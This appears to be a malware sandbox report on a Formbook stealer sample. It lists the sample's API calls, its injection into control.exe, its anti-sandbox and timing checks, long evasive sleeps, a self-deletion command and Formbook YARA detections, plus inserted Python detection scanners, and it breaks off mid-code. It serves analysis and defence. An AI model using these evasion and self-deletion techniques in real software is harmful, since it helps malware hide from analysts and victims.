Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_014596E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459950 NtQueueApcThread
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459560 NtWriteFile
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_0145AD30 NtSetContextThread
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_014599D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_014595F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_0145B040 NtSuspendThread
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459820 NtEnumerateKey
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_014598A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459760 NtOpenProcess
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459770 NtSetInformationFile
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_0145A770 NtOpenThread
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459B00 NtSetValueKey
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_0145A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_0145A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459650 NtQueryValueKey
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459A10 NtQuerySection
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_014596D0 NtCreateKey
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: 5_2_01459A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_047795D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_047799A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_047796D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_0477B040 NtSuspendThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779820 NtEnumerateKey
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_047798F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_047798A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779560 NtWriteFile
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779950 NtQueueApcThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_0477AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_047795F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_047799D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779A20 NtResumeThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779A10 NtQuerySection
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779770 NtSetInformationFile
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_0477A770 NtOpenThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779760 NtOpenProcess
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_0477A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_04779B00 NtSetValueKey
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_0477A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_047797A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_027B8270 NtReadFile
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_027B82F0 NtClose
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_027B83A0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_027B81C0 NtCreateFile
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_027B839A NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\control.exe | Code function: 10_2_027B81BA NtCreateFile
Source: C:\Windows\SysWOW64\control.exe | Code function: String function: 0473B150 appears 35 times
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Code function: String function: 0141B150 appears 35 times
Source: 350969bc_by_Libranalysis.exe | Binary or memory string: OriginalFilename vs 350969bc_by_Libranalysis.exe
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.669296365.0000000006830000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs 350969bc_by_Libranalysis.exe
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662905887.0000000003441000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs 350969bc_by_Libranalysis.exe
Source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716595208.000000000150F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 350969bc_by_Libranalysis.exe
Source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716202775.0000000001171000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameCONTROL.EXEj% vs 350969bc_by_Libranalysis.exe
Source: 350969bc_by_Libranalysis.exe | Binary or memory string: OriginalFilenameTextInfo.exe8 vs 350969bc_by_Libranalysis.exe
Source: 350969bc_by_Libranalysis.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 350969bc_by_Libranalysis.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@11/1@12/12
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\350969bc_by_Libranalysis.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_01
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: 350969bc_by_Libranalysis.exe | ReversingLabs: Detection: 36%
Source: 350969bc_by_Libranalysis.exe | String found in binary or memory: &Report-HelpToolStripMenuItem1
Source: unknown | Process created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Process created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Process created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | Process created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 350969bc_by_Libranalysis.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 350969bc_by_Libranalysis.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: 350969bc_by_Libranalysis.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716595208.000000000150F000.00000040.00000001.sdmp, control.exe, 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: 350969bc_by_Libranalysis.exe, control.exe
          Source: Binary string: control.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp
          Source: 350969bc_by_Libranalysis.exe Static PE information: 0x909C21C3 [Sun Nov 18 10:56:03 2046 UTC]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00410109 push ss; iretd 5_2_0041010D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004062F9 push ebx; ret 5_2_004062FA
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B3B5 push eax; ret 5_2_0041B408
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B46C push eax; ret 5_2_0041B472
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B402 push eax; ret 5_2_0041B408
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B40B push eax; ret 5_2_0041B472
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00406D23 push esi; ret 5_2_00406D2C
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0146D0D1 push ecx; ret 5_2_0146D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0478D0D1 push ecx; ret 10_2_0478D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A62F9 push ebx; ret 10_2_027A62FA
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB3B5 push eax; ret 10_2_027BB408
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B0109 push ss; iretd 10_2_027B010D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB46C push eax; ret 10_2_027BB472
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB40B push eax; ret 10_2_027BB472
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB402 push eax; ret 10_2_027BB408
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A6D23 push esi; ret 10_2_027A6D2C
          Source: initial sampleStatic PE information: section name: .text entropy: 7.87688083082
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe Process information set: NOOPENFILEERRORBOX (31 identical entries)
          Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: 350969bc_by_Libranalysis.exe PID: 6988, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000027A85E4 second address: 00000000027A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000027A897E second address: 00000000027A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe Code function: 5_2_004088B0 rdtsc 5_2_004088B0
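The RDTSC pairs above and the fs:[00000030h] PEB reads listed further down in this report are fixed byte sequences, so they can be located in a dump or an unpacked image without running the sample. The scanner below is an added example written for this write-up; it is not code from JoeSandbox or from the sample, and the byte buffer it scans is constructed here (offsets are local to that buffer, not the sample's addresses). It encodes the same idiom the interceptor caught: the report's two RDTSC addresses, 0x4085E4 and 0x4085EA, are six bytes apart, which is exactly the length of `rdtsc; xor ecx,ecx; add ecx,eax` (0F 31, 31 C9, 01 C1) before the second `rdtsc`.

```python
"""Byte-pattern scan for the two anti-analysis idioms flagged in the report.

Added example for this write-up, not code from JoeSandbox or from the sample.
SAMPLE below is a constructed buffer; its offsets are local, not the sample's RVAs.
"""

RDTSC = b"\x0f\x31"

# 32-bit reads of the PEB pointer from the TEB (fs:[30h]).  Both encodings of
# the eax form occur in compiler output; the ecx form is the one the report
# lists inside 5_2_01434120 and 5_2_01496DC9.
PEB_READS = [
    ("mov eax, fs:[30h]", b"\x64\xa1\x30\x00\x00\x00"),
    ("mov eax, fs:[30h]", b"\x64\x8b\x05\x30\x00\x00\x00"),
    ("mov ecx, fs:[30h]", b"\x64\x8b\x0d\x30\x00\x00\x00"),
]


def _offsets(code: bytes, pat: bytes):
    """All (possibly overlapping) offsets of pat in code."""
    out, i = [], code.find(pat)
    while i != -1:
        out.append(i)
        i = code.find(pat, i + 1)
    return out


def find_rdtsc_pairs(code: bytes, max_gap: int = 16):
    """Offsets (first, second) of two RDTSCs at most max_gap bytes apart.

    Two reads with only a few ALU ops between them is the timing-check idiom:
    the delta is a handful of cycles on bare metal but far larger when a
    hypervisor traps RDTSC or a debugger single-steps the gap.
    """
    hits = _offsets(code, RDTSC)
    return [(a, b) for a, b in zip(hits, hits[1:]) if b - a <= max_gap]


def find_peb_reads(code: bytes):
    """Sorted (offset, mnemonic) for every fs:[30h] PEB read found."""
    found = []
    for name, pat in PEB_READS:
        found += [(off, name) for off in _offsets(code, pat)]
    return sorted(found)


def scan(code: bytes):
    return {"rdtsc_pairs": find_rdtsc_pairs(code), "peb_reads": find_peb_reads(code)}


# Constructed sample: the report's sequence (rdtsc; xor ecx,ecx; add ecx,eax;
# rdtsc) encodes to 0F31 31C9 01C1 0F31, followed here by a BeingDebugged
# check through the PEB.  The two RDTSCs land six bytes apart, as in the report.
SAMPLE = (
    b"\x55\x8b\xec"                        # push ebp; mov ebp, esp
    + b"\x0f\x31\x31\xc9\x01\xc1\x0f\x31"  # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
    + b"\x90" * 4                          # nop padding
    + b"\x64\xa1\x30\x00\x00\x00"          # mov eax, fs:[30h]        ; PEB
    + b"\x0f\xb6\x40\x02"                  # movzx eax, byte [eax+2]  ; PEB.BeingDebugged
    + b"\xc3"                              # ret
)

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Pattern matching on raw bytes is a triage aid only: `0F 31` also occurs inside immediates and data, so confirm each hit with a disassembler, and widen `max_gap` if the loop body between the two reads is longer than a few instructions. The report's interceptor does the same thing dynamically, at the moment the instruction executes.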
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe TID: 6992 Thread sleep time: -100804s >= -30000s
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe TID: 7016 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2928 Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 1744 Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe Thread delayed: delay time: 100804
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe Thread delayed: delay time: 922337203685477
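The figure 922337203685477 in the sleep entries above is not arbitrary: NtDelayExecution takes a LARGE_INTEGER in 100-nanosecond ticks, and INT64_MAX ticks divided by 10,000 is exactly 922337203685477 milliseconds, roughly 29,000 years, so that thread would never wake on its own. The parser below is an added example for this write-up, not code from JoeSandbox; it reads the four sleep lines copied from the report and annotates each with the tick value, whether it crosses the report's own 30000 threshold, and a human-readable length. It assumes the report's figures are milliseconds despite the "s" suffix it prints (the 30000 threshold and the INT64_MAX arithmetic only line up under that reading).

```python
"""Interpret the 'Thread sleep time' lines from the report.

Added example for this write-up, not code from JoeSandbox or the sample.
Assumption: the report's figures are milliseconds (it prints an 's' suffix,
but its -30000 threshold and the 922337203685477 value only make sense as ms).
"""
import re

INT64_MAX = (1 << 63) - 1
# NtDelayExecution takes a LARGE_INTEGER in 100-ns ticks; the largest
# representable delay is INT64_MAX ticks = 922337203685477 ms (~29,000 years).
INFINITE_MS = INT64_MAX // 10_000

SLEEP_LINE = re.compile(
    r"Source:\s*(?P<proc>\S+)\s+TID:\s*(?P<tid>\d+)\s*Thread sleep time:\s*"
    r"-(?P<ms>\d+)s\s*>=\s*-(?P<threshold>\d+)s"
)

# Constructed input: the four sleep lines from the report, including the
# fused 'TID: 6992Thread' form the extraction produced.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe TID: 6992Thread sleep time: -100804s >= -30000s
Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe TID: 7016Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2928Thread sleep time: -50000s >= -30000s
Source: C:\Windows\SysWOW64\control.exe TID: 1744Thread sleep time: -48000s >= -30000s
"""


def to_100ns_ticks(ms: int) -> int:
    """Relative NtDelayExecution argument for a delay of ms: negative, 100-ns units."""
    return -(ms * 10_000)


def describe(ms: int) -> str:
    if ms >= INFINITE_MS:
        return "effectively infinite (INT64_MAX ticks)"
    s = ms / 1000
    if s < 60:
        return f"{s:.1f} s"
    if s < 3600:
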